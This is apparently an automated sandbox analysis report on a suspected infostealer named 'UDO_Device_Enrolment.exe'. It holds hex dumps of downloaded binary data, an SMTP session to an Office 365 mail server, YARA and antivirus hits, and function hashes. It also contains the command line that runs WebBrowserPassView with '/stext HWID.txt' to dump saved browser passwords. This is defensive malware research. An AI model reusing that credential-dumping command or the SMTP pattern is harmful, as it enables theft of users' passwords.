2022-09-25 18:29:04 UTC	167	IN	Data Raw: f9 8b 8d 5c ff ff ff 0f b6 04 08 50 8b c7 e8 6c e9 ff ff 8b bd 28 ff ff ff 59 66 f7 47 1c 00 40 74 13 83 7f 18 00 7e 0d 8b c7 e8 bc b9 ff ff 8b bd 28 ff ff ff ff b5 60 ff ff ff 8b d7 e8 2a da ff ff 59 89 85 4c ff ff ff e8 e5 da ff ff 89 85 68 ff ff ff 99 01 85 2c ff ff ff 11 95 30 ff ff ff 33 db 53 ff b5 4c ff ff ff e8 54 02 ff ff 01 85 34 ff ff ff 66 f7 47 1c 00 40 59 59 74 0b 8b 47 10 01 85 44 ff ff ff eb 0e 39 9d 68 ff ff ff 74 06 89 9d 44 ff ff ff 83 c7 28 3b bd 54 ff ff ff 89 bd 28 ff ff ff 0f 86 3d ff ff ff 8b 85 34 ff ff ff 99 52 50 e8 08 02 ff ff 8b f8 01 bd 34 ff ff ff 8b 85 34 ff ff ff 99 52 50 89 bd 48 ff ff ff e8 ec 01 ff ff 83 c4 10 3b f8 7d 06 ff 85 34 ff ff ff 8b 85 44 ff ff ff 99 8b d8 8b c2 89 85 14 ff ff ff 8b 85 34 ff ff ff 99 8b f8 8b Data Ascii: \Pl(YfG@t~(`*YLh,03SLT4fG@YYtGD9htD(;T(=4RP44RPH;}4D4
2022-09-25 18:29:04 UTC	183	IN	Data Raw: 18 8b 77 0c 7e 2f 0f b7 46 0e 66 85 c0 74 19 0f b7 c0 3b 03 7f 26 ff 36 8b 4d 10 53 ff 75 08 48 e8 b4 f4 ff ff 83 c4 0c ff 45 fc 8b 45 fc 83 c6 14 3b 07 7c d1 33 c0 5f 5e 5b c9 c3 ff 33 8b 45 fc 8b 7d 08 40 50 ff 75 10 e8 54 fd ff ff 83 c4 0c eb 9e 55 8b ec 83 ec 14 53 56 57 8b 7d 10 85 ff 75 07 33 c0 e9 ae 00 00 00 8b 75 0c 8b 06 8b 00 83 65 fc 00 83 3f 00 8b 5f 0c 89 45 ec 8b 45 08 8b 00 89 45 f0 7e 7f 8b 0b 80 39 1a 89 4d f4 75 0c 8b 06 e8 3b fc ff ff 8b 4d f4 eb 02 33 c0 85 c0 89 45 f8 7e 06 66 89 43 0e eb 4d 8d 45 f8 50 51 e8 83 13 00 00 85 c0 59 59 74 23 8b 45 f8 83 f8 01 7d e2 ff 75 ec 8b 45 fc 8b 7d f0 40 50 ff 75 14 e8 ca fc ff ff 83 c4 0c 33 c0 40 eb 38 8b 7d f4 8b 75 08 66 83 63 0e 00 e8 f6 02 00 00 85 c0 75 e7 8b 7d 10 8b 75 0c ff 45 fc 8b 45 Data Ascii: w~/Fft;&6MSuHEE;\|3_^[3E}@PuTUSVW}u3ue?_EEE~9Mu;M3E~fCMEPQYYt#E}uE}@Pu3@8}ufcu}uEE
2022-09-25 18:29:04 UTC	199	IN	Data Raw: 55 fc 8b 52 08 8b 75 08 8b c1 c1 e0 04 8b 44 10 0c 89 47 40 8b 43 2c 89 47 2c 6a 00 8b c6 66 c7 47 20 01 00 e8 89 3b 00 00 59 8b fe e8 86 a9 00 00 85 c0 74 12 ff 75 f0 e8 0e 1e 00 00 59 eb 07 8b 45 fc c6 40 1e 01 5e ff 75 fc 8b 5d 0c e8 2d 38 00 00 59 5f 5b c9 c3 55 8b ec 83 ec 0c 53 57 8b 7d 08 8b 1f c6 45 fc 00 e8 49 a9 00 00 85 c0 89 45 f8 0f 84 ac 00 00 00 8b 45 0c c1 e0 04 03 43 08 56 8b 00 8b 35 1c 01 45 00 50 56 8b fb 89 45 f4 e8 77 11 00 00 85 c0 59 59 75 26 ff 35 20 01 45 00 8b 7d 08 56 ff 75 f4 68 70 6a 45 00 e8 db 10 00 00 8b 9f 94 01 00 00 83 c4 10 c6 45 fc 01 eb 33 83 7d 14 00 8b 58 14 74 19 ff 75 14 8b 7d 08 56 ff 75 f4 68 88 6a 45 00 e8 af 10 00 00 83 c4 10 eb 11 ff 75 0c 8b 45 f8 53 6a 60 e8 12 46 ff ff 83 c4 0c ff 75 0c 8b 45 f8 53 ff 75 Data Ascii: URuDG@C,G,jfG ;YtuYE@^u]-8Y_[USW}EIEECV5EPVEwYYu&5 E}VuhpjEE3}Xtu}VuhjEuESj`FuESu
2022-09-25 18:29:04 UTC	215	IN	Data Raw: ff 83 c4 14 85 c0 74 0f 50 53 c6 43 1e 01 e8 73 2c fe ff 59 59 33 f6 5f 8b c6 5e c3 83 7c 24 08 00 53 8b d8 74 11 ff 74 24 10 ff 74 24 10 e8 5f ff ff ff 59 59 eb 03 8b 43 2c 85 c0 5b 74 0c 0f b6 4c 24 04 6b c9 14 8d 44 08 ec c3 0f b7 11 33 c0 66 83 fa ff 74 18 57 0f bf fa 3b fe 5f 74 0f 83 fe ff 75 41 39 41 0c 75 05 39 41 10 74 37 33 c0 0f bf d2 40 3b d6 74 05 83 fe ff 75 03 6a 04 58 8a 49 02 38 4c 24 04 75 03 40 40 c3 80 7c 24 04 02 75 05 80 f9 03 74 0c 80 7c 24 04 03 75 06 80 f9 02 75 01 40 c3 56 8b 34 81 57 eb 1c 8b 7e 18 8b 4c 24 0c 8b d3 8b c7 e8 16 3d fe ff 85 c0 75 05 38 04 1f 74 0c 8b 76 1c 85 f6 75 e0 33 c0 5f 5e c3 8b c6 eb f9 8b 4e 18 53 57 e8 91 3b fe ff 8b d8 0f b6 01 0f b6 80 f0 fa 44 00 03 c3 99 6a 17 5f f7 ff 51 8b 4c 24 10 8b fa 8b c7 e8 Data Ascii: tPSCs,YY3_^\|$Stt$t$_YYC,[tL$kD3ftW;_tuA9Au9At73@;tujXI8L$u@@\|$ut\|$uu@V4W~L$=u8tvu3_^NSW;Dj_QL$
2022-09-25 18:29:04 UTC	231	IN	Data Raw: 83 7d 24 63 0f b6 7b 23 74 05 8b 7d 24 eb 08 83 ff 63 75 03 6a 02 5f 39 75 20 74 17 ff 75 1c 8b 45 fc 56 ff 75 14 6a 4c e8 5a c6 fe ff 83 c4 10 89 45 e8 ff 75 14 8b 45 fc 56 ff 75 10 6a 34 e8 43 c6 fe ff 83 c4 10 3b fe 89 45 ec 0f 8e ba 00 00 00 83 ff 03 0f 8e b4 00 00 00 83 ff 04 0f 84 94 00 00 00 83 ff 05 0f 85 9f 00 00 00 8b 45 08 8b 00 33 ff f7 40 0c 00 00 00 02 74 17 8b 45 08 56 56 6a 6a 8b cb e8 e8 4e 00 00 8b f8 83 c4 0c 3b fe 75 3f 8b 45 08 8b 00 f7 40 0c 00 00 00 04 74 0d 56 56 53 e8 ec ea ff ff 83 c4 0c eb 02 33 c0 3b c6 75 1e 39 73 10 74 35 8b 7d 08 8b cf e8 1d bb ff ff 56 ff 75 10 8b c3 e8 31 c9 ff ff 59 59 eb 1c 8b 4d 08 e8 06 bb ff ff 6a 05 57 56 ff 75 14 ff 75 10 53 51 e8 7b c7 ff ff 83 c4 1c c7 45 f0 01 00 00 00 eb 2a 8b 45 fc 56 ff 75 28 Data Ascii: }$c{#t}$cuj_9u tuEVujLZEuEVuj4C;EE3@tEVVjjN;u?E@tVVS3;u9st5}Vu1YYMjWVuuSQ{E*EVu(
2022-09-25 18:29:04 UTC	247	IN	Data Raw: 08 59 7c e4 8b 45 50 80 78 1e 00 0f 85 42 06 00 00 8b 75 58 85 f6 0f 84 0b 04 00 00 8b 5d 74 8b 43 44 89 45 e8 40 56 53 89 43 44 e8 82 e0 ff ff 6a f0 50 6a 00 ff 75 f0 89 45 10 ff 75 e8 6a 29 ff 75 68 e8 d4 86 fe ff 89 45 28 8b 43 48 40 8d 78 01 89 45 34 8d 47 01 89 45 24 89 43 48 8b 45 68 89 7d dc e8 14 87 fe ff ff 43 48 89 45 14 8b 43 48 89 45 64 8b 45 68 e8 00 87 fe ff 89 45 2c 8b 43 48 8d 48 01 89 4d d8 8b 0e 03 c1 8d 48 01 89 43 48 89 4d 48 8b 0e 33 f6 56 57 03 c8 8b 45 68 56 6a 07 89 4b 48 e8 db 85 fe ff 8b 45 68 56 ff 75 34 56 6a 07 e8 cc 85 fe ff 8b 45 68 83 c4 44 ff 75 2c ff 75 64 6a 02 e8 37 86 fe ff 56 8d 45 58 50 ff 75 40 ff 75 30 53 e8 94 55 00 00 83 c4 20 3b c6 89 45 e0 0f 84 66 05 00 00 8b 45 58 85 c0 75 11 8b 45 78 8b 40 10 21 75 40 89 45 Data Ascii: Y\|EPxBuX]tCDE@VSCDjPjuEuj)uhE(CH@xE4GE$CHEh}CHECHEdEhE,CHHMHCHMH3VWEhVjKHEhVu4VjEhDu,udj7VEXPu@u0SU ;EfEXuEx@!u@E
2022-09-25 18:29:04 UTC	263	IN	Data Raw: 8b d7 e8 28 49 fe ff 8b 55 10 8b 45 08 e8 37 f5 fe ff 8b 45 e4 8b d7 e8 13 49 fe ff 5f 5e 5b c9 c3 55 8b ec 83 ec 0c 53 56 8b f0 8b 4e 14 8b 46 1c 33 db 85 c9 57 7e 1a 8b 55 0c 8b 52 18 83 c0 10 39 50 f8 75 06 f6 00 81 75 01 43 83 c0 28 49 75 ef 8b 45 10 33 ff 85 c0 74 39 8b 08 21 7d fc 85 c9 7e 29 8b 40 0c 89 45 f8 8b 00 80 38 98 75 1c 8b 40 18 8b 55 0c 3b 42 18 75 11 8b 45 f8 ff 45 fc 83 c0 14 39 4d fc 89 45 f8 7c dd 39 4d fc 75 02 8b f9 8b c3 6b c0 14 8d 44 f8 30 50 8b 45 08 8b 00 e8 6a 6d fd ff 85 c0 59 75 15 8b 7d 08 68 c4 5e 45 00 e8 44 7c fd ff 59 33 c0 e9 af 00 00 00 83 65 fc 00 8b cb 6b c9 0c 8d 50 30 03 ca 89 18 8d 1c f9 89 78 08 89 50 04 89 48 0c 89 58 10 83 7e 14 00 8b 5e 1c 7e 4f 83 c3 10 83 c2 04 89 5d f8 89 55 f4 8b 53 f8 8b 5d 0c 3b 53 18 Data Ascii: (IUE7EI_^[USVNF3W~UR9PuuC(IuE3t9!}~)@E8u@U;BuEE9ME\|9MukD0PEjmYu}h^ED\|Y3ekP0xPHX~^~O]US];S
2022-09-25 18:29:04 UTC	279	IN	Data Raw: 44 00 04 75 f2 3b c8 0f 8e 5e 03 00 00 c7 06 84 00 00 00 eb 8f c7 06 52 00 00 00 eb 4f 8b c1 83 e8 27 0f 84 54 02 00 00 48 74 69 48 74 5e 48 74 53 48 74 48 48 74 3d 48 0f 85 99 00 00 00 80 7b 01 2d 75 22 0f b6 4b 02 6a 02 58 eb 0a 83 f9 0a 74 09 40 0f b6 0c 18 85 c9 75 f2 c7 06 95 00 00 00 e9 35 03 00 00 c7 06 57 00 00 00 33 c0 40 e9 27 03 00 00 c7 06 19 00 00 00 eb f0 c7 06 56 00 00 00 eb e8 c7 06 58 00 00 00 eb e0 c7 06 17 00 00 00 eb d8 c7 06 16 00 00 00 eb d0 c7 06 76 00 00 00 eb c8 83 f9 3f 0f 8f 70 01 00 00 0f 84 48 01 00 00 83 f9 3b 0f 8f b4 00 00 00 0f 84 a4 00 00 00 83 f9 2f 74 61 7e 0e 83 f9 39 7e 1e 83 f9 3a 0f 84 94 02 00 00 f6 81 f0 fb 44 00 46 0f 85 65 02 00 00 33 c0 40 e9 a9 02 00 00 c7 06 81 00 00 00 33 c0 eb 05 40 0f b6 0c 18 f6 81 f0 fb Data Ascii: Du;^RO'THtiHt^HtSHtHHt=H{-u"KjXt@u5W3@'VXv?pH;/ta~9~:DFe3@3@
2022-09-25 18:29:04 UTC	295	IN	Data Raw: 23 4c 24 24 8b 6c 24 28 23 e8 0b cd 03 cb 89 4c 24 14 8b 8c 24 b0 00 00 00 8b e9 c1 c5 0e 8b d9 c1 cb 07 33 eb 8b 9c 24 e4 00 00 00 c1 e9 03 33 e9 03 ac 24 d0 00 00 00 8b cb c1 c1 0f c1 c3 0d 33 cb 8b 9c 24 e4 00 00 00 c1 eb 0a 33 cb 03 cd 03 8c 24 ac 00 00 00 89 8c 24 ec 00 00 00 8b 4c 24 30 8b d9 c1 cb 0b 8b e9 c1 c5 07 33 dd 8b e9 c1 cd 06 33 dd 03 9c 24 ec 00 00 00 8b ef 33 ee 23 e9 8b 4c 24 14 33 ee 03 eb 8d 94 2a 85 35 0e f4 01 54 24 24 89 54 24 10 8b d9 c1 cb 0d 8b d1 c1 c2 0a 33 da 8b d1 c1 ca 02 33 da 03 5c 24 10 8b d0 0b d1 23 54 24 28 8b e8 23 e9 0b d5 03 d3 89 54 24 20 8b 94 24 b4 00 00 00 8b ea 8b da c1 c5 0e c1 cb 07 33 eb 8b 9c 24 e8 00 00 00 c1 ea 03 33 ea 03 ac 24 d4 00 00 00 8b d3 c1 c2 0f c1 c3 0d 33 d3 8b 9c 24 e8 00 00 00 c1 eb 0a 33 Data Ascii: #L$$l$(#L$$3$3$3$3$$L$033$3#L$3*5T$$T$33\$#T$(#T$ $3$3$3$3
2022-09-25 18:29:04 UTC	311	IN	Data Raw: ff 8d 46 1c 56 e8 b6 ea ff ff 01 7c 24 20 83 c4 10 2b ef 33 db 83 fd 40 7c 2d 8b fd c1 ef 06 8b d7 f7 da c1 e2 06 03 ea eb 06 8d 9b 00 00 00 00 8b 44 24 10 56 e8 86 ea ff ff 83 44 24 14 40 83 c4 04 83 ef 01 75 e9 85 ed 7e 13 8b 44 24 10 55 50 8d 4c 33 1c 51 e8 af 9b ff ff 83 c4 0c 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 08 53 56 8b f0 8b 0e 8b 46 04 03 c0 03 c0 03 c0 8b d1 c1 ea 1d 0b c2 8b d8 c1 eb 18 88 5c 24 08 8b d8 c1 eb 10 88 44 24 0b 8d 14 cd 00 00 00 00 88 5c 24 09 8b d8 8b c2 c1 e8 18 88 44 24 0c 8b c2 c1 e8 10 88 44 24 0d 8b c2 c1 e8 08 c1 eb 08 83 e1 3f 83 f9 38 88 44 24 0e 88 5c 24 0a 88 54 24 0f b8 38 00 00 00 72 05 b8 78 00 00 00 2b c1 50 68 28 fa 44 00 e8 d3 fe ff ff 8d 4c 24 10 6a 08 51 e8 c7 fe ff ff 0f b6 56 0b 88 17 Data Ascii: FV\|$ +3@\|-D$VD$@u~D$UPL3Q_[]SVF\$D$\$D$D$?8D$\$T$8rx+Ph(DL$jQV
2022-09-25 18:29:04 UTC	327	IN	Data Raw: f9 01 90 00 6d 01 9a 00 6d 01 9a 00 85 02 9a 00 cc 00 9a 00 9a 00 17 02 24 02 24 02 6d 01 83 01 fc 01 e9 00 b8 05 c6 04 c6 04 b0 05 b0 05 c6 04 b6 05 82 05 8d 04 bc 05 bc 05 bc 05 bc 05 c6 04 8d 04 b6 05 82 05 82 05 c6 04 a8 05 3a 05 91 05 c6 04 c6 04 a8 05 c6 04 a8 05 c6 04 a8 05 8b 05 21 05 21 05 21 05 6b 05 54 05 54 05 8b 05 21 05 38 05 21 05 6b 05 21 05 21 05 e6 04 dd 04 e6 04 dd 04 e6 04 dd 04 c6 04 c6 04 a2 04 a5 04 97 04 91 04 93 04 8d 04 8c 04 db 04 dc 04 dc 04 bc 04 bc 04 bc 04 bc 04 b6 ff b6 ff b6 ff b6 ff b6 ff b6 ff ab 03 68 00 a8 02 3b 02 47 01 01 00 d4 03 1a 00 cc 03 cb 03 b2 03 85 03 66 03 3e 03 26 03 36 00 15 00 b7 ff fe 01 f2 00 ae 04 a6 04 92 04 12 04 89 04 54 04 7a 04 75 04 6c 04 f7 03 67 04 02 04 0a 04 fc 03 53 04 ec 03 5c 04 61 04 ed Data Ascii: mm$$m:!!!kTT!8!k!!h;Gf>&6TzulgS\a
2022-09-25 18:29:04 UTC	343	IN	Data Raw: 72 61 6e 64 6f 6d 00 00 69 66 6e 75 6c 6c 00 00 68 65 78 00 63 6f 61 6c 65 73 63 65 00 00 00 00 6c 6f 77 65 72 00 00 00 75 70 70 65 72 00 00 00 61 62 73 00 73 75 62 73 74 72 00 00 6c 65 6e 67 74 68 00 00 74 79 70 65 6f 66 00 00 6d 61 78 00 6d 69 6e 00 74 72 69 6d 00 00 00 00 72 74 72 69 6d 00 00 00 6c 74 72 69 6d 00 00 00 20 52 45 41 4c 00 00 00 20 49 4e 54 00 00 00 00 20 4e 55 4d 00 00 00 00 20 54 45 58 54 00 00 00 73 71 6c 69 74 65 5f 61 74 74 61 63 68 00 00 00 73 71 6c 69 74 65 5f 64 65 74 61 63 68 00 00 00 74 62 6c 2c 69 64 78 2c 73 74 61 74 00 00 00 00 73 71 6c 69 74 65 5f 73 74 61 74 31 00 00 00 00 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 70 61 72 65 6e 74 00 00 00 00 73 71 6c 69 74 65 5f 72 65 6e 61 6d 65 5f 74 72 69 67 67 65 72 00 00 00 73 71 6c Data Ascii: randomifnullhexcoalescelowerupperabssubstrlengthtypeofmaxmintrimrtrimltrim REAL INT NUM TEXTsqlite_attachsqlite_detachtbl,idx,statsqlite_stat1sqlite_rename_parentsqlite_rename_triggersql
2022-09-25 18:29:04 UTC	359	IN	Data Raw: 67 57 00 00 56 02 53 65 74 46 6f 63 75 73 00 00 45 01 47 65 74 50 61 72 65 6e 74 00 7a 02 53 65 74 54 69 6d 65 72 00 00 0c 00 42 65 67 69 6e 44 65 66 65 72 57 69 6e 64 6f 77 50 6f 73 00 c5 00 45 6e 64 44 65 66 65 72 57 69 6e 64 6f 77 50 6f 73 00 b5 01 4b 69 6c 6c 54 69 6d 65 72 00 2c 01 47 65 74 4d 65 6e 75 00 0c 01 47 65 74 44 43 00 59 01 47 65 74 53 75 62 4d 65 6e 75 00 00 c1 00 45 6d 70 74 79 43 6c 69 70 62 6f 61 72 64 00 00 c2 00 45 6e 61 62 6c 65 4d 65 6e 75 49 74 65 6d 00 00 2a 02 52 65 6c 65 61 73 65 44 43 00 fd 00 47 65 74 43 6c 61 73 73 4e 61 6d 65 57 00 f6 01 4f 70 65 6e 43 6c 69 70 62 6f 61 72 64 00 ec 01 4d 6f 76 65 57 69 6e 64 6f 77 00 00 39 00 43 68 65 63 6b 4d 65 6e 75 49 74 65 6d 00 39 01 47 65 74 4d 65 6e 75 53 74 72 69 6e 67 57 00 00 32 Data Ascii: gWVSetFocusEGetParentzSetTimerBeginDeferWindowPosEndDeferWindowPosKillTimer,GetMenuGetDCYGetSubMenuEmptyClipboardEnableMenuItem*ReleaseDCGetClassNameWOpenClipboardMoveWindow9CheckMenuItem9GetMenuStringW2
2022-09-25 18:29:04 UTC	375	IN	Data Raw: 00 f0 77 77 77 77 60 88 8e 66 68 77 8f 7f 72 2f 66 77 07 77 77 77 77 77 77 77 77 77 77 87 e7 08 87 ff f7 07 07 77 77 77 77 77 77 08 8f 00 00 8f ff f7 77 07 0f ff ff ff ff f0 77 77 77 77 e6 88 8e 00 68 77 8f f7 f7 27 f6 f7 07 77 77 77 77 77 77 77 77 77 78 fe 7e 70 7f ff f7 07 07 00 00 00 00 00 07 08 8f ff ff 8f 88 f0 00 07 0f ff ff ff 0f f0 77 77 00 00 ee 68 8e 60 68 77 8f 76 7f 7f 76 77 07 77 77 77 77 77 77 77 77 77 78 ef e7 e0 7f ff f7 07 07 0f ff ff ff ff 07 08 8f 00 00 8f ff f8 f0 77 0f f0 ff f0 f0 f0 77 77 ee ee ee e6 8e 66 68 77 8f f6 f7 27 f7 f7 07 77 77 77 77 77 77 77 77 77 78 fe fe 70 7f ff f7 07 07 0f ff ff ff ff 07 08 8f ff ff 8f ff f8 07 77 0f 0f 0f 0f 0f 00 07 47 ee ee ee e0 8e 66 68 77 8f 76 6f 22 7f 77 07 77 77 77 77 77 77 77 77 77 77 8f ef Data Ascii: wwww`fhwr/fwwwwwwwwwwwwwwwwwwwwwwhw'wwwwwwwwwx~pwwh`hwvvwwwwwwwwwwxwwwfhw'wwwwwwwwwxpwGfhwvo"wwwwwwwwwww
2022-09-25 18:29:04 UTC	391	IN	Data Raw: 00 00 00 01 8f 1b 1b 2c 93 25 25 92 9b 2e 2e d9 9b 2e 2e e0 9b 28 2c e0 99 20 21 de 8d 14 16 bc 87 0a 0b 5a 72 07 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ac 41 00 01 ac 41 00 00 ac 41 00 00 ac 41 00 00 ac 41 00 00 ac 41 00 00 ac 41 00 00 ac 41 00 00 ac 41 00 00 ac 41 00 00 ac 41 00 00 ac 41 80 01 ac 41 c0 01 ac 41 e0 07 ac 41 ff ff ac 41 00 00 00 00 10 00 26 00 46 00 69 00 6c 00 65 00 00 00 00 00 41 9c 26 00 53 00 61 00 76 00 65 00 20 00 53 00 65 00 6c 00 65 00 63 00 74 00 65 00 64 00 20 00 49 00 74 00 65 00 6d 00 73 00 09 00 43 00 74 00 72 00 6c 00 2b 00 53 Data Ascii: ,%%....(, !ZrAAAAAAAAAAAAAAAA&FileA&Save Selected ItemsCtrl+S

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 25, 2022 20:29:17.539499044 CEST	587	49705	52.97.188.70	192.168.2.3	220 FRYP281CA0009.outlook.office365.com Microsoft ESMTP MAIL Service ready at Sun, 25 Sep 2022 18:29:17 +0000
Sep 25, 2022 20:29:17.540721893 CEST	49705	587	192.168.2.3	52.97.188.70	EHLO 347688
Sep 25, 2022 20:29:17.558779001 CEST	587	49705	52.97.188.70	192.168.2.3	250-FRYP281CA0009.outlook.office365.com Hello [84.17.52.43] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Sep 25, 2022 20:29:17.559046030 CEST	49705	587	192.168.2.3	52.97.188.70	STARTTLS
Sep 25, 2022 20:29:17.576828957 CEST	587	49705	52.97.188.70	192.168.2.3	220 2.0.0 SMTP server ready

Target ID:	0
Start time:	20:28:59
Start date:	25/09/2022
Path:	C:\Users\user\Desktop\UDO_Device_Enrolment.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\UDO_Device_Enrolment.exe"
Imagebase:	0x150000
File size:	208384 bytes
MD5 hash:	33D42728D32AE2EAE31E4E1666B9B41C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	20:29:10
Start date:	25/09/2022
Path:	C:\temp\Windows32\WebBrowserPassView.exe
Wow64 process (32bit):	true
Commandline:	"C:\temp\Windows32\WebBrowserPassView.exe" /stext HWID.txt
Imagebase:	0x400000
File size:	402944 bytes
MD5 hash:	2024EA60DA870A221DB260482117258B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000000.267006505.000000000044F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000000.266140823.000000000044F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000000.267314538.000000000044F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\temp\Windows32\WebBrowserPassView.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs Detection: 43%, Metadefender, Browse
Reputation:	low

Show Windows behavior

Function 00007FFBAD205733 Relevance: 4.2, Instructions: 4153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce59fc34c4231149dfd06f9280e7ef77dab9cb4aaecf0018c9624610c904675
Instruction ID: 207fd921b12d45d5d082d0c467b34ac0c14119ae3be44785aa695f349709c5f4
Opcode Fuzzy Hash: 7ce59fc34c4231149dfd06f9280e7ef77dab9cb4aaecf0018c9624610c904675
Instruction Fuzzy Hash: 256307B180E7865FE36AEF34C4566A53BE0EF59310F0409FDC89D8B597EA28AC06C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2B35B9 Relevance: 3.7, Strings: 2, Instructions: 1204COMMON

Download Yara Rule

Strings

@V, xrefs: 00007FFBAD2B3B22
@V, xrefs: 00007FFBAD2B3853

Memory Dump Source

Source File: 00000000.00000002.339971319.00007FFBAD2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad2b0000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID: @V$@V
API String ID: 0-2717963455
Opcode ID: c55a6e796bd3a03aca83a1b48a53d4e2efdc87ec6038fc9b0d45ee978c0bcc0f
Instruction ID: eafd206736a6e49c03de90f9c986d8b1451660a59577d130e20df3376eab2a25
Opcode Fuzzy Hash: c55a6e796bd3a03aca83a1b48a53d4e2efdc87ec6038fc9b0d45ee978c0bcc0f
Instruction Fuzzy Hash: 77822BB190EBCA0FE767A77888251A57FE0DF5A210B0902FFD489CB1D7E9589809C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD20034F Relevance: 1.3, Instructions: 1304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03c6185cbb3a73ab7f22dabef5b95935cefcf1a0eebb5d77a08a55dc2037808
Instruction ID: 9587cec01db9fae6eb054fd0ca267e4e2882f6b0bafdffae8f23d7f54d9bd718
Opcode Fuzzy Hash: b03c6185cbb3a73ab7f22dabef5b95935cefcf1a0eebb5d77a08a55dc2037808
Instruction Fuzzy Hash: 5D92B470A18A199FEB59EF3CC495AA877E1FF58300F1045B9D44EC72A7DE24AC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2B1303 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

@V, xrefs: 00007FFBAD2B144D

Memory Dump Source

Source File: 00000000.00000002.339971319.00007FFBAD2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad2b0000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID: @V
API String ID: 0-162826808
Opcode ID: 2e5ef703f189dc04074d7528d7df4d815470e8f454aedeb1cbf2dab55d3e97f4
Instruction ID: d5bfc029ea001f0e76d9b03770588d383a35eead474b117c2ca5c4eee85d7180
Opcode Fuzzy Hash: 2e5ef703f189dc04074d7528d7df4d815470e8f454aedeb1cbf2dab55d3e97f4
Instruction Fuzzy Hash: 2451D362B0EF9A4FEBA7E66CD4511B47BD1EF59210B0801BEC549C759BF804AC46C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2053A2 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

`_^, xrefs: 00007FFBAD2053B1

Memory Dump Source

Source File: 00000000.00000002.339631134.00007FFBAD200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad200000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID: `_^
API String ID: 0-3531142974
Opcode ID: a4de373329219af284de81f6b4a53bb871cc1846fe5cef495018c57926e120c6
Instruction ID: 0b610d15c9f4708dc2f54ce88356bf50a22a7abbba7543404cf594c90dafb14c
Opcode Fuzzy Hash: a4de373329219af284de81f6b4a53bb871cc1846fe5cef495018c57926e120c6
Instruction Fuzzy Hash: 2E3166A2909B5A0FE351FF3CD4911E13BE0EF59321B04067AD88EC71D7ED646C0AC291

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAD2B4858 Relevance: 1.0, Instructions: 960COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339971319.00007FFBAD2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbad2b0000_UDO_Device_Enrolment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28ec0aec4dcdb0229ec665195292f684747f1a814801474a708642addc3d6e60
Instruction ID: 404fd6daeb5ece2a70033e896fad3044e18143749a97897c79577dc42558c168
Opcode Fuzzy Hash: 28ec0aec4dcdb0229ec665195292f684747f1a814801474a708642addc3d6e60
